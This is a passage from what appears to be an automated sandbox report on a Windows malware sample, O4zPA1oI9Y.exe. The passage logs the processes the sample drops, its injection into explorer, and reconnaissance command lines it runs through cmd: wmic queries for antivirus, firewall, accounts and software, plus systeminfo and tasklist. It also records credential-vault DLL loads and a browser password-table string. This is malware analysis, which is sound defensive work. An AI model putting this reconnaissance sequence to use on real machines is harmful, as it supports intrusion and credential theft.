    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2288&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2288&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2412&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2412&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2424&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2424&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2516&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2516&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2552&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2552&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2560&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2560&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2600&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2600&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2624&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2624&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2648&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2648&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2692&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2692&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2764&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2764&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2916&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2916&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3008&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3008&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3624&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3624&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3668&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3668&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3808&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3808&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3952&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3952&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4168&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4168&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4356&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4356&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4400&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4400&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5416&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5416&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6016&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6016&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5428&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5428&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1888&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1888&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5312&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5312&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6296&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6296&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3108&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3108&quot;::GetOwner
    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 9A0D.tmp.13.dr, 9690.tmp.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: O4zPA1oI9Y.exeReversingLabs: Detection: 78%
    Source: unknownProcess created: C:\Users\user\Desktop\O4zPA1oI9Y.exe "C:\Users\user\Desktop\O4zPA1oI9Y.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jvgasii C:\Users\user\AppData\Roaming\jvgasii
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DE97.exe C:\Users\user\AppData\Local\Temp\DE97.exe
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\uegasii C:\Users\user\AppData\Roaming\uegasii
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8CAE.exe C:\Users\user\AppData\Local\Temp\8CAE.exe
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeProcess created: C:\Windows\System32\cmd.exe cmd
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DE97.exe C:\Users\user\AppData\Local\Temp\DE97.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8CAE.exe C:\Users\user\AppData\Local\Temp\8CAE.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: nejupazabujicojoxalajahi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: nejupazabujicojoxalajahi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: cryptnet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
